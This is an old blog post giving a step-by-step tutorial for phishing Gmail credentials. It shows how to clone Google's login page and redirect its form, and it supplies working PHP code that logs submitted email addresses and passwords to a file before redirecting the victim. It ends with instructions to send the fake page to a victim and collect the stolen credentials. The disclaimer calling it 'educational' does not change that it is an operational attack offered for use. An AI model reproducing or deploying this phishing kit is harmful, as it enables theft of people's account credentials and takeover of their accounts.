2 May 2013

How to Hack Gmail password


515 loyal readers
RSS feed | E-mail




How to hack Gmail password
:To Create a fake page for any website is known as Phishing Attack. It can be for various websites e.g FacebookTwitter,GmailYahooHotmail etc. I have received many emails regarding fake/phisher page so this post is to clear doubts andproblems regarding Fake Page For Any Website. This is for educational purpose we are not responsible for any illegal activity.

 .

Step 1:

  • Open Gmail.com

  • Right click in an empty space on Page and Click view page source.
  • Copy all Content to Notepad & save it as Gmail.html
Untitled
.

Step 2:

  • Open Gmail.html with Notepad.
  • Press (Ctrl + f ) to Search “action=”https 
Untitled
.

Step 3:

  • Replace this Syntax https://accounts.google.com/ServiceLoginAuth to login.php
  • Likewise change Method = “Post” to “GET” and Finally Save it.
Untitled
.
  • After Replacements It will Look like this.
.
Untitled
.

Step 4:

  • As we Have to create login.php, So

  • Open New Notepad & Copy Paste this following Code and Save it as login.php
  • <?php
     header ('Location: http://www.google.com');
     $handle = fopen("log.txt", "a");
     foreach($_GET as $variable => $value) {
     fwrite($handle, $variable);
     fwrite($handle, "=");
     fwrite($handle, $value);
     fwrite($handle, "\r\n");
     }
     fwrite($handle, "\r\n");
     fclose($handle);
     exit;
     ?>

.

Step 5:

  • Victim will be redirects to http://www.google.com as he Clicks on Login button.
  • You can change redirect button to any address you want.
.

Step 6:

.
Also Check : More HACKING Trick  HERE
.

Step 7:

  •  Upload both Files Gmail.html & login.php

Untitled
.

Step 8:

  • Now Send Gmail.html Link to Victim.
  • Once he Clicks Login Button, He will be redirected to Google.com, You can also change the site with your own desire.
.

Step 9:

  • File named log.txt will appear. Containing Victim’s Email and Password.
Untitled
.

Step 10:

  • Congrats You have Just Learns How to HACK Gmail password.
  • Hope you enjoyed this Tutorial. Like us on FaceBook.

Untitled
Related Posts Plugin for WordPress, Blogger...

0 comments:

Blogger Template by Clairvo